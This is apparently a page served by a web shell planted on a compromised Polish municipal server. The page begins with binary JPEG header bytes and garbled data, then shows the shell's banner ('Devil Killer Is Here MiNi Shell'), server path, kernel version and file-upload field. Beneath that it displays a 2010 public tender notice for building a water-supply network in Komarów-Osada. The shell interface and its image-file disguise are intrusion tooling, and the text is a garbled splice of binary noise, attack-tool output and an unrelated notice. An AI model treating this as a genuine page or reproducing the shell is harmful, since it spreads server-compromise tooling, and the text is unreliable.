JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/80945-N-2010.html

<p class="kh_header"><b>Komarów-Osada: Budowa sieci wodociągowej wraz z przyłączami, ujęciem wody i modernizacją stacji wodociągowej w m. Janówka Wschodnia, Janówka Zachodnia, Huta Komarowska, Komarów Wieś gm. Komarów-Osada</b><br>
<b>Numer ogłoszenia: 80945 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Komarów-Osada , Rynek 15, 22-435 Komarów-Osada, woj. lubelskie, tel. 084 6153102 w. 50, faks 084 6153185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.komarowosada.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej wraz z przyłączami, ujęciem wody i modernizacją stacji wodociągowej w m. Janówka Wschodnia, Janówka Zachodnia, Huta Komarowska, Komarów Wieś gm. Komarów-Osada.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa sieci wodociągowej wraz z przyłączami, ujęciem wody i modernizacją stacji wodociągowej w m. Janówka Wschodnia, Janówka Zachodnia, Huta Komarowska, Komarów Wieś gm. Komarów-Osada
Zakres robót obejmuje
1.	Modernizację stacji wodociągowej
2.	Roboty budowlane - stacja wodociągowa
3.	Roboty elektryczne - stacja wodociągowa
4.	Budowa zbiornika wyrównawczego V-100 m3
5.	Budowę sieci wodociągowej o długości 11595 m
6.	Wykonanie przyłączy wodociągowych w ilości 185 sztuk o długości 3516m
Realizacja ww. przedsięwzięcia realizowana będzie w dwóch etapach
I etap obejmuje
1.	Modernizację stacji wodociągowej
2.	Roboty budowlane - stacja wodociągowa
3.	Roboty elektryczne - stacja wodociągowa
4.	Budowa zbiornika wyrównawczego V-100 m3
Wymagany termin realizacji I etapu  do dnia  25 listopada 2010 roku

II etap obejmuje:
1.	Budowę sieci wodociągowej o długości 11595 m
2.  Wykonanie przyłączy wodociągowych w ilości 185 sztuk o długości 3516m
Wymagany termin realizacji II etapu  do dnia  25 października 2011 roku

2. Wykonanie zadania obejmuje dodatkowo:
1)	Kompleksową obsługę geodezyjna wraz z powykonawcza inwentaryzacją
2)	Wykonanie dokumentacji powykonawczej
3)	Organizację ruchu oznakowanie budowy wraz z oznaczeniem inwestycji realizowanej przy współfinasowaniu funduszy unijnych zgodnie z wytycznymi Ministerstwa Rozwoju Regionalnego.
4)	Sporządzenie planu bezpieczeństwa i ochrony zdrowia jeżeli odrębne przepisy wymagają sporządzenia takiego planu
5)	Uzyskanie pozwolenia na zajęcie pasa drogowego, jeżeli taki przypadek wystąpi
6)	Dokonania uzgodnień, uzyskania wszelkich opinii w trakcie realizacji robót niezbędnych do wykonania przedmiotu zamówienia i przekazania go do użytku i poniesienia opłat z tym związanych
7)	Urządzenie terenu budowy, wykonania przyłączeń wodociągowych i elektroenergetycznych dla potrzeb budowy oraz poniesienia  ich kosztów jeżeli taka konieczność wystąpi
8)	W przypadku zniszczeń lub uszkodzeń obiektów, urządzeń lub ich części w toku realizacji - naprawienia szkody lub doprowadzenia do stanu pierwotnego
9)	Przywrócenie do stanu pierwotnego robót z uwzględnieniem zakresu nowopowstałych obiektów budowlanych
10)	Ponoszenie pełnej odpowiedzialności za dozór mienia na terenie robot, jak i za wszystkie szkody powstałe w trakcie trwania robót na terenie przejętym od Zamawiającego lub mających związek z prowadzonymi robotami w tym szkody majątku osób trzecich, ograniczenie praw osób trzecich z tytułu prowadzenia robót itp.
11)	Ponoszenie pełnej odpowiedzialności za szkody oraz następstwa nieszczęśliwych wypadków pracowników i osób trzecich powstałe w związku z prowadzonymi robotami w tym także ruchem pojazdów
12)	Przeprowadzenie rozruchu technologicznego, zakończonego uzyskaniem wymaganych parametrów, potwierdzonych badaniami właściwych instytucji w tym zakresie, jeżeli przepisy wymagają tych badań
13)	Opracowanie instrukcji obsługi zbiornika wraz z instrukcjami na stanowisku pracy.
14)	Przeszkolenie pracowników Zamawiającego w zakresie obsługi zbiornika wraz ze szkoleniem na stanowisku pracy
15)	Pozostałych zadań nie wymienionych w specyfikacji istotnych warunków zamówienia

3.  Szczegółowy zakres robót budowlanych związanych z przedmiotem zamówienia określa dokumentacja techniczno-projektowa wykonana przez WZIR Zastępstwo Inwestycyjne Zamość zał Nr 9
- specyfikacja techniczna odbioru robot
- kosztorysy ofertowe
4.	Całość robót zostanie wykonana zgodnie z przepisami BHP. Użyte materiały i urządzenia będą miały zgodne z projektami i zaleceniami Zamawiającego oraz będą posiadać atesty i dopuszczenia na rynek polski
5.	W przypadku gdy w dokumentacji projektowej opisano materiały i urządzenia za pomocą podania nazwy ich producenta, patentów lub pochodzenia, to w odniesieniu do tych materiałów lub urządzeń Zamawiający dopuszcza ujecie w ofercie, a następnie zastosowanie innych równoważnych materiałów lub urządzeń pod warunkiem posiadania przez nie parametrów nie gorszych niż materiały i urządzenia, które je zastępują. W takiej sytuacji Wykonawca stosując materiały i urządzenia równoważne zobowiązany jest zgodnie z art. 30 ust. 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych wykazać, ze oferowane przez niego materiały i urządzenia spełniają wymagania Zamawiającego.
6.	W sytuacji gdy wykonawca zamierza zastosować inne materiały i urządzenia niż podane w dokumentacji projektowej winien dołączyć ich równoważniki (nazwy materiałów i urządzeń zaproponowanych w ofercie) wraz z załączeniem charakterystyk oraz dokumentów potwierdzających równoważność zaproponowanych urządzeń i materiałów. W przypadku, gdy wykonawca takiego wykazu nie dołączy do oferty zobowiązany będzie do wbudowania urządzeń i materiałów zgodnie z dokumentacją techniczną, o której mowa w powyższym punkcie 3.
7.	Dokumentacja, o której mowa powyżej w punkcie 3 jest załącznikiem do ogłoszenia o przetargu dostępna do pobrania na stronie internetowej w wersji elektronicznej. W przypadku gdyby wykonawca nie posiadał dostępu do Internetu musi  zgłosić się do Zamawiającego. W tej sytuacji dokumentacja projektowa będzie udostępniona w siedzibie Zamawiającego - tj w Urzędzie gminy Komarów-Osada pokój nr 13..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.13.00-8, 45.33.00.00-9, 45.31.00.00-3, 45.22.32.00-8, 45.22.35.00-1, 45.32.00.00-6, 45.45.30.00-7, 45.42.10.00-4, 45.41.00.00-4, 45.26.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w kwocie 7.000,00 złotych  słownie:siedem tysiecy złotych
2.	Wadium wnosi się przed upływem terminu składania ofert. Przez wniesienie wadium w pieniądzu uważa się datę ich wpływu na konto Zamawiającego wniesione wadium w formie gotówkowej w dniu otwarcia ofert musi znajdować się na koncie Zamawiającego). Wadium należy wnieść na konto Zamawiającego Urząd Gminy Komarów-Osada Powiatowy Bank Spółdzielczy Zamość o)Komarów  na  konto 28 9644 0007 2001 0050 0539 0001  z dopiskiem  Budowa sieci wodociągowej wraz z przyłączami, ujęciem wody  i modernizacja stacji wodociagowej w m. Janówka Wschodnioa, Janówka Zachodnia, Huta Komaarowska, Komarów Wieś
3.	Zamawiający żąda dowodu wniesienia wadium np. kopii przelewu dołączonego do oferty. 
4.	Wadium w innej formie niż w pieniądzu należy złożyć  w siedzibie Zamawiającego pokój nr 13 w formie oryginału - oddzielnie  nie dołączać do oferty 
5.	Wadium może być wnoszone: 
a)	w pieniądzu, - przelewem na konto Zamawiającego 
b)	w poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej gwarancjach tym poręczenie kasy jest zawsze poręczeniem pieniężnym  
c)	w gwarancjach bankowych,
d)	w gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Dz. U. Nr 109, poz. 1158, z póź.zm.
6.	Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania z ofertą tj.: 30 dni licząc od dnia otwarcia ofert w przetargu. Oferta zabezpieczona na okres krótszy zostanie odrzucona.
7.	Aby wadium wnoszone w pieniądzu było skutecznie ważne musi znajdować się na wyżej wymienionym koncie Zamawiającego przed upływem terminu składania ofert, a tym samym Wykonawca musi uwzględnić przy tej formie wnoszenia wadium czasokres operacji bankowych zarówno w baku Wykonawcy jak i w banku Zamawiającego. Przy wpłacie wadium na konto bankowe Zamawiającego należy uwzględnić wszystkie koszty naliczane przez bank. Zamawiający nie dopuszcza, aby opłaty pobierane przez bank potracone były z kwoty wadium pod rygorem wykluczenia Wykonawcy i odrzucenia oferty.
8.	W przypadku wniesienia wadium w formie wymienionej w pkt. 3 podpunkt  b), c), d), e)  do oferty należy dołączyć, w osobnej koszulce oryginał tego dokumentu. Nie należy go bindować ani zszywać. 
9.	Wadium wniesione w innej formie niż w pieniądzu musi być wystawione na Zamawiającego i muszą w nim być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium . Okoliczności te musza uwzględniać  sytuacje określone:
      1) w art. 46 ust. 4 a Pzp tj: jeżeli Wykonawca na wezwanie na mocy art. 26 ust. 3 ustawy          Pzp nie złoży dokumentów lub oświadczeń objętych dyspozycją art. 25 ust.1 Pzp lub           pełnomocnictw, chyba że udowodni, że wynika to  z przyczyn nie leżących po jego          stronie,
2) w art. 46 ust. 5 gdy Wykonawca
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
- nie wniósł zabezpieczenia należytego wykonania umowy
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
10.	Zamawiający zwraca niezwłocznie wadium  na warunkach określonych w art. 46 ustawy Pzp z zastrzeżeniem  art. 46 ust. 4a i ust. 5.
11.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
- zobowiązanie gwaranta -banku, zakładu ubezpieczeń- do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt. 6 bez potwierdzania tych okoliczności.
- termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą.
12.	Wykonawca, który nie wniesie wadium, w tym również na przedłużony okres związania z ofertą lub nie zgodzi się na przedłużenie okresu związania z ofertą, zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego.
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictwa, chyba, że udowodni, że wynika to z przyczyn niezależnych po jego stronie. 
14.	Na wniosek wykonawcy, którego oferta zostanie uznana za najkorzystniejszą zamawiający zaliczy wadium wpłacone w pieniądzu na poczet należytego wykonania umowy.
15.	Dyspozycję w zakresie wypłaty wadium wpłaconego w formie pieniężnej dla Wykonawcy, którego oferta została wybrana, Zamawiający przekaże do właściwego oddziału banku wykonawcy niezwłocznie po podpisaniu umowy i wniesieniu zabezpieczenia należytego wykonania umowy.
16.	W przypadku wykonawców ubiegających się wspólnie o zamówienie wadium wniesione przez dowolnego Wykonawcę składającego ofertę wspólną uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie  warunku dotyczącego posiadania wiedzy i doswiadczenia zamawiajacy wymaga wykonania w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, co najmniej dwóch zamówień (robót) porównywalnych pod względem zakresu i charakteru z przedmiotem zamówienia.
Za porównywalne zamówienia uważa się wykonanie:
- co najmniej dwóch robót z zakresu modernizacji stacji wodociągowej wraz z budową zbiornika o pojemności nie mniejszej niż 100 m3 o łącznej wartości nie mniejszej niż 1.500.000,00 złotych
- co najmniej jednej roboty z zakresu budowy sieci wodociągowej o wartości nie mniejszej niż 1.000.000,00 złotych
Na potwierdzenie spełnienia warunku należy złożyć dokumenty wymienione w SIWZ w rozdziale VI pkt  3.1, 
Zamawiający dokona  oceny spełnienia warunku na podstawie złożonych oświadczeń lub dokumentów, uwzględniając zapisy art. 26 ust. 3 ustawy  wg formuły spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, a w szczególności: tj. dysponowania osobami zdolnymi do wykonania zamówienia w tym:
- Kierownikiem budowy posiadającego wykształcenie techniczne z uprawnieniami bez ograniczeń, co najmniej w specjalności sieci, instalacje i urządzenia wodociągowe. Osoba przewidziana do pełnienia funkcji kierownika budowy winna posiadać, co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi w tym jedna z budową w zakresie sieci wodociągowej.
- Kierownikiem robót konstrukcyjno-budowlanych posiadającego wykształcenie techniczne z uprawnieniami bez ograniczeń o specjalności konstrukcyjno-budowlanej posiadającego  doświadczenie w pełnieniu funkcji kierownika budowy robót  oraz doświadczenie w wykonaniu co najmniej jednego zbiornika na wodę o pojemności nie mniejszej niż 100 m3   
- Kierownikiem robot elektrycznych posiadającego wykształcenie techniczne z uprawnieniami w specjalności sieci, instalacji elektrycznych i elektroenergetycznych posiadającego  doświadczenie w pełnieniu funkcji kierownika budowy. 
- Uprawnienia osób nie mogą w swojej treści zawierać jakichkolwiek ograniczeń.
Na potwierdzenie spełnienia warunku i należy złożyć dokumenty wymienione w SIWZ w rozdziale VI pkt 2.1, 2.2, 
Zamawiający dokona  oceny spełnienia warunku na podstawie złożonych oświadczeń lub dokumentów, uwzględniając zapisy art. 26 ust. 3 ustawy  wg formuły spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego sytuacji ekonomicznej i finansowej :
- posiadają środki finansowe lub zdolność kredytową w wysokości 3.500,000,00 złotych
Na potwierdzenie spełnienia warunku i należy złożyć dokumenty wymienione w SIWZ w rozdziale VI pkt 4.1

-  Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 300.000,00 złotych na czas trwania umowy.
Na potwierdzenie spełnienia warunku i należy złożyć dokumenty wymienione w SIWZ w rozdziale VI pkt 4.2
Zamawiający dokona  oceny spełnienia warunku na podstawie złożonych oświadczeń lub dokumentów, uwzględniając zapisy art. 26 ust. 3 ustawy  wg formuły spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
